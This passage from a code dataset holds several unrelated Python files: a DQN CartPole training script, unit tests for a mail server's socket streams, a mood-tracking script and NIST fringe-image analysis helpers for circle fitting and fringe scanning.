torch.max(q_vals_v, dim=1)\n action = int(act_v.item())\n\n # do step in the environment\n new_state, reward, is_done, _ = self.env.step(action)\n self.total_reward += reward\n\n exp = Experience(self.state, action, reward, is_done, new_state)\n self.exp_buffer.append(exp)\n self.state = new_state\n if is_done:\n done_reward = self.total_reward\n self._reset()\n return done_reward\n\n\ndef calc_loss(batch, net, tgt_net, device, GAMMA, double=True):\n states, actions, rewards, dones, next_states = batch\n\n states_v = torch.FloatTensor(states).to(device)\n next_states_v = torch.FloatTensor(next_states).to(device)\n actions_v = torch.tensor(actions).to(device)\n rewards_v = torch.FloatTensor(rewards).to(device)\n done_mask = torch.BoolTensor(dones).to(device)\n\n state_action_values = net(states_v).gather(1, actions_v.unsqueeze(-1)).squeeze(-1)\n if double:\n next_state_actions = net(next_states_v).max(1)[1]\n next_state_values = tgt_net(next_states_v).gather(1, next_state_actions.unsqueeze(-1)).squeeze(-1)\n else:\n next_state_values = tgt_net(next_states_v).max(1)[0]\n next_state_values[done_mask] = 0.0 # without this, training will not converge\n next_state_values = next_state_values.detach()\n\n expected_state_action_values = next_state_values * GAMMA + rewards_v\n return nn.MSELoss()(state_action_values, expected_state_action_values)\n\n\nif __name__ == '__main__':\n gamma = 0.99 # future reward discount\n EPSILON_DECAY_LAST_FRAME = 10 ** 5\n REPLAY_MIN_SIZE = 5000\n SYNC_TARGET_FRAMES = 1000\n target_reward = 199.9\n epsilon_start = 1.0 # exploration probability at start\n epsilon_stop = 0.01 # minimum 
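A worked sketch of the arithmetic in cond_prob above: the probability that three houses drawn without replacement are all in OldTown. The counts below are hypothetical, not taken from the CSV.

n_oldtown, n_total = 239, 1460   # hypothetical counts
p = (n_oldtown / n_total) \
    * ((n_oldtown - 1) / (n_total - 1)) \
    * ((n_oldtown - 2) / (n_total - 2))
print(round(p, 6))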
exploration probability\n decay_rate = 0.0001 # exponential decay rate for exploration prob\n hidden_size = 64 # number of units in each Q-network hidden layer\n learning_rate = 0.0001 # Q-network learning rate\n replay_size = 10000 # memory capacity\n batch_size = 20 # experience mini-batch size\n\n env = gym.make('CartPole-v0')\n buffer = ExperienceBuffer(replay_size)\n agent = Agent(env, buffer)\n\n model = DQN(env.observation_space.shape[0], env.action_space.n, hidden_size)\n tgt_net = DQN(env.observation_space.shape[0], env.action_space.n, hidden_size)\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\n writer = SummaryWriter(comment=\"-CartPole\")\n total_rewards = []\n frame_idx = 0\n ts_frame = 0\n ts = time.time()\n best_mean_reward = None\n while True:\n frame_idx += 1\n epsilon = max(epsilon_stop, epsilon_start - frame_idx / EPSILON_DECAY_LAST_FRAME)\n\n reward = agent.play_step(model, epsilon)\n if reward is not None:\n total_rewards.append(reward)\n speed = (frame_idx - ts_frame) / (time.time() - ts)\n ts_frame = frame_idx\n ts = time.time()\n mean_reward = np.mean(total_rewards[-100:])\n print(\"%d: done %d games, mean reward %.3f, eps %.2f, speed %.2f f/s\" % (\n frame_idx, len(total_rewards), mean_reward, epsilon, speed))\n writer.add_scalar(\"epsilon\", epsilon, frame_idx)\n writer.add_scalar(\"speed\", speed, frame_idx)\n writer.add_scalar(\"reward_100\", mean_reward, frame_idx)\n writer.add_scalar(\"reward\", reward, frame_idx)\n if best_mean_reward is None or best_mean_reward < mean_reward:\n torch.save(model.state_dict(), \"/tmp/cart_pole_deep_q1_best.dat\")\n if best_mean_reward is not None:\n print(\"Best mean reward updated %.3f -> %.3f, model saved\" % (best_mean_reward, mean_reward))\n best_mean_reward = mean_reward\n if mean_reward > target_reward:\n print(\"Solved in %d frames!\" % frame_idx)\n break\n\n if len(buffer) < REPLAY_MIN_SIZE:\n continue\n\n if frame_idx % SYNC_TARGET_FRAMES == 0:\n tgt_net.load_state_dict(model.state_dict())\n\n model.train()\n optimizer.zero_grad()\n batch = buffer.sample(batch_size)\n loss_t = calc_loss(batch, model, tgt_net, device=agent.device, GAMMA=gamma)\n loss_t.backward()\n optimizer.step()\n writer.close()\n\n test_model(env, model, test_max_steps=400)\n env.close()\n","sub_path":"rl/q/cart_pole_deep_q_1.py","file_name":"cart_pole_deep_q_1.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"308570785","text":"# (The MIT License)\n#\n# Copyright (c) 2013 Kura\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the 'Software'), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
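A minimal sketch of the (double) DQN target computed in calc_loss above, y = r + gamma * Q_tgt(s', argmax_a Q_online(s', a)), zeroed on terminal states; all tensors are made up.

import torch

gamma = 0.99
rewards = torch.tensor([1.0, 1.0])
dones = torch.tensor([False, True])
q_next_online = torch.tensor([[0.2, 0.9], [0.5, 0.1]])  # online net at s'
q_next_target = torch.tensor([[0.3, 1.1], [0.4, 0.2]])  # target net at s'
best_actions = q_next_online.max(1)[1]                   # argmax from online net
next_vals = q_next_target.gather(1, best_actions.unsqueeze(-1)).squeeze(-1)
next_vals[dones] = 0.0                                   # no bootstrap past terminal
target = rewards + gamma * next_vals
print(target)   # tensor([2.0890, 1.0000])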
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport os\nimport unittest\nimport random\nimport socket\n\nfrom tornado.options import options\nfrom tornado import iostream\n\nfrom blackhole.connection import connection_stream\nfrom blackhole import opts\nfrom blackhole.ssl_utils import sslkwargs\n\n\nclass BaseStream(unittest.TestCase):\n\n def setUp(self):\n options.ssl = False\n options.port = random.randint(5000, 10000)\n options.ssl_port = random.randint(5000, 10000)\n\n def tearDown(self):\n for s in self.sockets.values():\n s.close()\n self.sockets = {}\n\n\nclass TestSocketConnectionStream(BaseStream):\n\n def setUp(self):\n super(TestSocketConnectionStream, self).setUp()\n self.socket = socket.socket()\n\n def test_socket_connection_stream(self):\n self.assertTrue(isinstance(connection_stream(self.socket),\n iostream.IOStream))\n\n def tearDown(self):\n self.socket.close()\n\n\nclass TestSSLSocketConnectionStream(BaseStream):\n\n def setUp(self):\n super(TestSSLSocketConnectionStream, self).setUp()\n options.ssl = True\n sslkwargs['keyfile'] = os.path.join(os.path.dirname(__file__),\n 'test.key')\n sslkwargs['certfile'] = os.path.join(os.path.dirname(__file__),\n 'test.crt')\n self.socket = socket.socket()\n self.socket.bind(('127.0.0.1', options.ssl_port))\n\n def test_ssl_socket_connection_stream(self):\n self.assertTrue(isinstance(connection_stream(self.socket),\n iostream.SSLIOStream))\n\n def tearDown(self):\n self.socket.close()\n","sub_path":"tests/test_streams.py","file_name":"test_streams.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"66737134","text":"import datetime, json\nclass Tracker:\n def __init__(self):\n self.moodFile = json.loads(open('moodData.json').read())\n \n def add(self):\n event = input('what happened: ' )\n date = str(datetime.datetime.now())\n value = int(input('give it a score: '))\n self.moodFile.update(\n {\n date:{\n event: value\n }\n }\n )\n \n def save(self):\n with open('moodData.json', 'w') as saveFile:\n saveFile.write(\n json.dumps(\n self.moodFile,\n indent = 2,\n sort_keys = True\n )\n )\n \nif __name__ == '__main__':\n myTracker = Tracker()\n myTracker.add()\n myTracker.save()\n","sub_path":"Tracker.py","file_name":"Tracker.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"300627926","text":"\"\"\"\r\nVarious functions for fringefinder.\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n//////////////////////////////////////////////////////////////////////////////\r\nNotes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n June, 2018 (ported from Matlab)\r\n\r\n//////////////////////////////////////////////////////////////////////////////\r\n\"\"\"\r\n\r\nimport sys\r\nimport os\r\nimport copy\r\nimport csv\r\nimport math\r\nimport numpy as np\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.widgets import Cursor\r\nfrom scipy import optimize\r\nplt.ion()\r\n\r\nfringefinderfuncs_directory = os.path.dirname(os.path.realpath(__file__)) #get path of 
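A minimal sketch of the JSON persistence pattern used by the Tracker class above, writing to a temp file rather than moodData.json:

import json, datetime, tempfile, os

entry = {str(datetime.datetime.now()): {"went for a walk": 7}}  # made-up event
path = os.path.join(tempfile.gettempdir(), "moodData.json")
with open(path, "w") as f:
    f.write(json.dumps(entry, indent=2, sort_keys=True))
with open(path) as f:
    print(json.loads(f.read()))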
wavelength_air.py\r\nsys.path.append(os.path.abspath(fringefinderfuncs_directory))\r\nfrom ref_index import edlen_ri, rh2wvpp #pylint: disable=C0413\r\n\r\ndef cpause(interval):\r\n \"\"\"custom pause function, to update only active figure\"\"\"\r\n backend = plt.rcParams['backend']\r\n if backend in matplotlib.rcsetup.interactive_bk:\r\n figManager = matplotlib._pylab_helpers.Gcf.get_active() #pylint: disable=W0212\r\n if figManager is not None:\r\n canvas = figManager.canvas\r\n if canvas.figure.stale:\r\n canvas.draw()\r\n canvas.start_event_loop(interval)\r\n return\r\n\r\ndef manual_ballcenter(ballimage, ballimageax):\r\n \"\"\"\r\n manual_ballcenter.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n June, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n Take input from user for ball edge position, fit circle, output x,y coordinates and radius\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -none\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -guinputs\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n - (x,y) of circle\r\n - radius of circle\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from mv1.00 to v1.00\r\n June 13, 2018\r\n -converted to python by hand to have identical behavior\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n ballimageax.imshow(ballimage, cmap='gray')\r\n\r\n ballimageax.set_title('Pick points believed to be the ball edge. Right-click when done.')\r\n ballcursor = Cursor(ballimageax, useblit=True, color='C8', linewidth=1, alpha=0.5) #pylint: disable=W0612\r\n xy = plt.ginput(n=0, mouse_add=1, mouse_pop=2, mouse_stop=3, timeout=0)\r\n x = np.asarray(xy)[:, 0]\r\n y = np.asarray(xy)[:, 1]\r\n plt.plot(x, y, 'C2+')\r\n\r\n xc, yc, r = circfit(x, y)\r\n\r\n return xc, yc, r\r\n\r\ndef wavelength_air(T_air, RH, P, lambda_vac):\r\n \"\"\"\r\n wavelength_air.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n June, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n calculate wavelength in air using Edlen\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n verified against Engineering Metrology Toolbox (http://emtoolbox.nist.gov/Wavelength/Edlen.asp)\r\n ported from strang_ambients.m v1.12\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n - T_air - temperature of air, deg. 
C\r\n - RH - relative humidity of air, %RH\r\n - P - beam air pressure, kPa\r\n - lambda_vac - vacuum wavelength of light source\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n - lambda_air - wavelength of light in ambient air, nm\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from mv1.12 to v1.00\r\n June 13, 2018\r\n -converted to python by hand to have identical behavior\r\n -changed instrument input to wavelength input\r\n -removed toggle of frequency or wavelength. now only wavelength in nm\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n n_air = edlen_ri(lambda_vac, T_air, P*1e3, rh2wvpp(RH, T_air))\r\n return lambda_vac/n_air\r\n\r\ndef circfit(x, y):\r\n \"\"\"\r\n circfit.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n June, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n Take input from user for ball edge position, fit circle, output x,y coordinates and radius\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -none\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -x - array of x-coordinates\r\n -y - array of y-coordinates\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n - (x,y) of circle\r\n - radius of circle\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from v1.00 to v1.00\r\n June 14, 2018\r\n -initial version. NOT a port of circfit.m\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n def calc_R(xc, yc):\r\n \"\"\"\r\n internal function for circfit\r\n \"\"\"\r\n return np.sqrt((x-xc)**2 + (y-yc)**2)\r\n def f_2(c):\r\n \"\"\"\r\n internal function for circfit\r\n \"\"\"\r\n Ri = calc_R(*c)\r\n return Ri - Ri.mean()\r\n\r\n center_est = x.mean(), y.mean()\r\n center_2, _ = optimize.leastsq(f_2, center_est)\r\n xc_2, yc_2 = center_2\r\n Ri_2 = calc_R(*center_2)\r\n R_2 = Ri_2.mean()\r\n\r\n return xc_2, yc_2, R_2\r\n\r\ndef drawcircle(xc, yc, r, axesid):\r\n \"\"\"\r\n drawcircle.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n June, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n Plot circle on given figure with x- and y-center coordinates with radius r. 
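A minimal sketch exercising the least-squares circle fit above (assuming circfit from this module is in scope) on synthetic points from a known circle, center (3, -2) and radius 5, plus a little noise:

import numpy as np

rng = np.random.default_rng(0)
t = rng.uniform(0, 2 * np.pi, 50)
x = 3 + 5 * np.cos(t) + rng.normal(0, 0.05, 50)
y = -2 + 5 * np.sin(t) + rng.normal(0, 0.05, 50)
xc, yc, r = circfit(x, y)
print(round(xc, 2), round(yc, 2), round(r, 2))   # ~3.0 -2.0 5.0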
pixels\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -none\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -xc - center in x, pixels\r\n -yc - center in y, pixels\r\n -r - radius, pixels\r\n -axesid- axes ID\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n - (x,y) of circle\r\n - radius of circle\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from v1.00 to v1.00\r\n June 13, 2018\r\n -initial version. NOT port of drawcircle.m\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n circle = plt.Circle((xc, yc), r, edgecolor='C2', facecolor='C0', alpha=0.25)\r\n axesid.add_patch(circle)\r\n cpause(0.0001)\r\n\r\ndef ballimagegen(datain):\r\n \"\"\"\r\n ballimagegen.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n June, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n generate image of sphere from changing fringe images\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -none\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -data containing fringe images and measuring forces, data structure format\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n -image of ball shadow\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from mv1.003 to v1.00\r\n June 20, 2018\r\n -converted from ballimagegen.m to replicate behavior\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n print('\\nCalculating ball image shadow via fringe pitching...\\n')\r\n Fchange = 4. 
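A minimal sketch of the matplotlib patch idiom that drawcircle above wraps, with made-up center, radius, and axis limits:

import matplotlib.pyplot as plt

fig, ax = plt.subplots()
ax.add_patch(plt.Circle((100, 120), 40, edgecolor='C2', facecolor='C0', alpha=0.25))
ax.set_xlim(0, 200)
ax.set_ylim(200, 0)   # image-style axes: y increases downward
plt.show()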
#combine image when recorded force changes by Fchange grams or more\r\n previousF = 1\r\n _, no_forces = np.shape(datain['data'])\r\n data_cp = copy.deepcopy(datain)\r\n MeasForce = np.zeros((no_forces, 2))\r\n for i in range(0, no_forces):\r\n MeasForce[i, :] = [data_cp['data'][0, i].MeasForce, i]\r\n MeasForce = MeasForce[MeasForce[:, 0].argsort()]\r\n for i in range(0, no_forces):\r\n data_cp['data'][0, i].FringeImage = datain['data'][0, int(MeasForce[i, 1])].FringeImage\r\n data_cp['data'][0, i].MeasForce = datain['data'][0, int(MeasForce[i, 1])].MeasForce\r\n im_combined = data_cp['data'][0, 0].FringeImage.astype(float) #load first fringeimage to begin combining images\r\n count = 1\r\n for i in range(1, no_forces):\r\n if (float(data_cp['data'][0, i].MeasForce) - float(data_cp['data'][0, previousF].MeasForce)) >= Fchange:\r\n im_combined = im_combined + data_cp['data'][0, i].FringeImage.astype(float)\r\n count += 1\r\n previousF = i\r\n im_combined = im_combined / count\r\n del data_cp\r\n\r\n return im_combined\r\n\r\ndef fringescan(fringeimage, X_top, Y_top, X_endtop, Y_endtop, dy_scan, n_I, I_cutoff, automode, pf_top_line): #pylint: disable=R0913, R0914, R0912, R0915\r\n \"\"\"\r\n fringescan.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n June, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n from scan endpoints, determine center of a destructive fringe\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -fringe analysis paper\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -fringeimage - 2D matrix image\r\n -X_top - array of startpoints for fringe scan in x\r\n -Y_top - array of startpoints for fringe scan in y\r\n -X_endtop - array of endpoints for fringe scan in x\r\n -Y_endtop - array of endpoints for fringe scan in x\r\n -dy_scan - height of scan in y\r\n -n_I - number of intensity values\r\n -I_cutoff - intensity cutoff value\r\n -automode - selection of automode\r\n -pf_top_line - fit, for use with automode. 
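A minimal numpy sketch of the averaging idea in ballimagegen above: accumulate frames whose recorded force differs by at least Fchange from the last accepted frame, then divide by the number kept. Frames and forces are made up.

import numpy as np

Fchange = 4.0
frames = [np.full((2, 2), v, dtype=float) for v in (10, 20, 30)]
forces = [5.0, 6.0, 12.0]                  # hypothetical grams
combined, count, last = frames[0].copy(), 1, 0
for i in range(1, len(frames)):
    if forces[i] - forces[last] >= Fchange:
        combined += frames[i]
        count += 1
        last = i
combined /= count
print(combined)   # frames 0 and 2 averaged -> all entries 20.0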
set 0 if not using automode\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n - center_top - matrix of fringe centers, (x,y)\r\n - pf_top_line - fit through fringe centers\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from mv1.062 to v1.00\r\n June 14, 2018\r\n -converted from fringescan.m to replicate behavior\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n I_gap = 2\r\n X_top = np.round(X_top) #round points to prevent subscript errors\r\n Y_top = np.round(Y_top)\r\n X_endtop = np.round(X_endtop)\r\n Y_endtop = np.round(Y_endtop)\r\n n_scans = sum(X_endtop - X_top) #number of scan points is equivalent to total number of horizontal pixels selected\r\n I_top = np.zeros((n_I.astype(int), n_scans.astype(int))) #pad I_top with zeros\r\n X_top_pts = np.zeros((n_I.astype(int), n_scans.astype(int)))\r\n Y_top_pts = np.zeros((n_I.astype(int), n_scans.astype(int)))\r\n if automode == 'off':\r\n pf_top_line = np.polyfit([X_top[0], X_endtop[-1]], [Y_top[0], Y_endtop[-1]], 1)\r\n if abs(1/pf_top_line[0]) > 1e9: #if slope of perpendicular starts approaching infinity\r\n pf_top_line[0] = 1/1e9 #very slightly angle the slope to prevent Inf errors in perpendicular line\r\n\r\n # scan fringes at approximately normal\r\n j = 0\r\n n = 1\r\n for i, X_top_val in enumerate(X_top):\r\n dy = (Y_endtop[i] - Y_top[i])/(X_endtop[i] - X_top_val) #change in y for each scan box\r\n x = X_top_val #first scan center point\r\n y = Y_top[i]\r\n while x < X_endtop[i]:\r\n perp_pf_top_line = [-1/pf_top_line[0], (y + 1/pf_top_line[0]*x)] #calculate perpendicular to line at each scan center\r\n perp_pfy_top_line = [1/perp_pf_top_line[0], -perp_pf_top_line[1]/perp_pf_top_line[0]] #calculate x = (y-b)/m line\r\n y_scan = np.round(np.linspace(y-dy_scan, y+dy_scan, n_I)) #y points for the scan\r\n x_scan = np.round(np.polyval(perp_pfy_top_line, y_scan)) #calculate x points based on the y points, round to prevent subscript errors\r\n for a, y_scan_val in enumerate(y_scan): #scan across fringe at angle in matrix\r\n I_top[a, j] = fringeimage[y_scan_val.astype(int), x_scan[a].astype(int)]\r\n X_top_pts[:, j] = x_scan #create x and y points for the scan\r\n Y_top_pts[:, j] = y_scan\r\n y = Y_top[i] + np.round(n*dy) #generate next scan center point\r\n x += 1\r\n j += 1\r\n n += 1\r\n n = 1 #reset n\r\n\r\n # Top fringe center finder: approximating to quadratic function\r\n _, n_scans = np.shape(X_top_pts)\r\n center_top = np.zeros((n_scans, 2))\r\n for i in range(0, n_scans):\r\n removed = I_top[:, i] < I_cutoff #find where intensity drops below cutoff\r\n removed2_index = np.diff(removed) >= I_gap #find any gaps >= I_gap\r\n removed2 = np.array([])\r\n for j, removed2_val in enumerate(removed2_index):\r\n if removed2_val <= np.round(len(removed)/2):\r\n removed2 = np.array([])\r\n removed2 = removed[removed2_val::]\r\n jmin = removed2_val\r\n elif removed2_val > np.round(len(removed)/2):\r\n if not removed2.any():\r\n removed2 = removed[0:removed2_val]\r\n else:\r\n removed2 = removed[jmin:removed2_val]\r\n break\r\n if not removed2.any():\r\n removed = removed2\r\n pf_Itop = np.polyfit(Y_top_pts[removed, i], I_top[removed, i], 2) #fit intensity data to quadratic\r\n dfdy = [2*pf_Itop[0], pf_Itop[1]] #derivative of intensity profile fit\r\n center_top[i, 1] = np.roots(dfdy) #calculate where dfdy is zero\r\n pf_scan = np.polyfit(Y_top_pts[:, i], X_top_pts[:, i], 1) 
#calculate line for scan\r\n center_top[i, 0] = np.polyval(pf_scan, center_top[i, 1]) #calculate position of x-center\r\n j = np.where(center_top[:, 0] == 0)[0] #if coordinates were 0,0, delete\r\n center_top = np.delete(center_top, j, axis=0)\r\n pf_top_line = np.polyfit(center_top[:, 0], center_top[:, 1], 1) #fit line to fringe centers\r\n\r\n # Redo fringe scans and fits with scans nearly normal to fringe\r\n if abs(1/pf_top_line[0] > 1e9): #if slope of perpendicular starts approaching infinity\r\n pf_top_line[0] = 1/1e9 #very slightly angle the slope to prevent Inf errors in perpendicular line\r\n j = 0\r\n n = 1\r\n for i, X_top_val in enumerate(X_top):\r\n dy = (Y_endtop[i] - Y_top[i])/(X_endtop[i] - X_top[i]) #change in y for each scan box\r\n x = X_top[i] #first scan center point\r\n y = Y_top[i]\r\n while x < X_endtop[i]:\r\n perp_pf_top_line = [-1/pf_top_line[0], (y + 1/pf_top_line[0]*x)] #calculate perpendicular to line at each scan center\r\n perp_pfy_top_line = [1/perp_pf_top_line[0], -perp_pf_top_line[1]/perp_pf_top_line[0]] #calculate x = (y-b)/m line\r\n y_scan = np.round(np.linspace(y-dy_scan, y+dy_scan, n_I)) #y points for the scan\r\n x_scan = np.round(np.polyval(perp_pfy_top_line, y_scan)) #calculate x points based on the y points, round to prevent subscript errors\r\n for a, y_scan_val in enumerate(y_scan): #scan across fringe at angle in matrix\r\n I_top[a, j] = fringeimage[y_scan[a].astype(int), x_scan[a].astype(int)]\r\n X_top_pts[:, j] = x_scan #create x and y points for the scan\r\n Y_top_pts[:, j] = y_scan\r\n y = Y_top[i] + np.round(n*dy) #generate next scan center point\r\n x += 1\r\n j += 1\r\n n += 1\r\n n = 1 #reset n\r\n # Top fringe center finder\r\n # fit fringe intensity profile to polynomial, f(x), find where df/dx = 0\r\n _, n_scans = np.shape(X_top_pts)\r\n center_top = np.zeros((n_scans, 2))\r\n for i in range(0, n_scans):\r\n removed = I_top[:, i] < I_cutoff #find where intensity drops below cutoff\r\n removed2_index = np.diff(removed) >= I_gap #find any gaps >= I_gap\r\n removed2 = np.array([])\r\n for j, removed2_val in enumerate(removed2_index):\r\n if removed2_val <= np.round(len(removed)/2):\r\n removed2 = np.array([])\r\n removed2 = removed[removed2_val::]\r\n jmin = removed2_val\r\n elif removed2_val > np.round(len(removed)/2):\r\n if not removed2.any():\r\n removed2 = removed[0:removed2_val]\r\n else:\r\n removed2 = removed[jmin:removed2_val]\r\n break\r\n if not removed2.any():\r\n removed = removed2\r\n pf_Itop = np.polyfit(Y_top_pts[removed, i], I_top[removed, i], 2) #fit intensity data to quadratic\r\n dfdy = [2*pf_Itop[0], pf_Itop[1]] #derivative of intensity profile fit\r\n center_top[i, 1] = np.roots(dfdy) #calculate where dfdy is zero\r\n pf_scan = np.polyfit(Y_top_pts[:, i], X_top_pts[:, i], 1) #calculate line for scan\r\n center_top[i, 0] = np.polyval(pf_scan, center_top[i, 1]) #calculate position of x-center\r\n j = np.where(center_top[:, 0] == 0)[0] #if coordinates were 0,0, delete\r\n center_top = np.delete(center_top, j, axis=0)\r\n pf_top_line = np.polyfit(center_top[:, 0], center_top[:, 1], 1) #fit line to fringe centers\r\n\r\n return center_top, pf_top_line\r\n\r\ndef minpt2crv(pf, xo, yo):\r\n \"\"\"\r\n fringescan.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n June, 
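A minimal sketch of the center-finding step in fringescan above: fit the intensity profile to a quadratic and take the root of its derivative as the fringe center. The synthetic dip below is centered at y = 4.3.

import numpy as np

y = np.arange(10.0)
intensity = (y - 4.3) ** 2 + 2.0          # made-up destructive-fringe profile
a, b, c = np.polyfit(y, intensity, 2)
center = np.roots([2 * a, b])[0]          # where d(intensity)/dy = 0
print(round(center, 2))                   # 4.3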
2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n calculate location on 2nd-order polynomial (ax^2 + bx + c) where point (xo, yo) is closest\r\n used for approximation of a line through a point normal to given 2nd-order polynomial\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -none\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -a, b, c - coefficients of polynomial ax^2 + bx + c\r\n -xo - x-location of point\r\n -yo - y-location of point\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n -z, location in x of point\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from mv1.0 to v1.00\r\n June 20, 2018\r\n -converted from minpt2crv.m to replicate behavior\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n A = 4*pf[0]**2\r\n B = 6*pf[0]*pf[1]\r\n C = -4*pf[0]*yo + 4*pf[0]*pf[2] + 2*pf[1]**2 + 2\r\n D = -2*pf[1]*yo - 2*xo + 2*pf[1]*pf[2]\r\n\r\n def df(x, A, B, C, D):\r\n \"\"\"\r\n internal function for minpt2crv, calculates derivative\r\n \"\"\"\r\n return A*x**3 + B*x**2 + C*x + D\r\n\r\n z = optimize.fsolve(df, xo, args=(A, B, C, D))\r\n\r\n return z\r\n\r\ndef 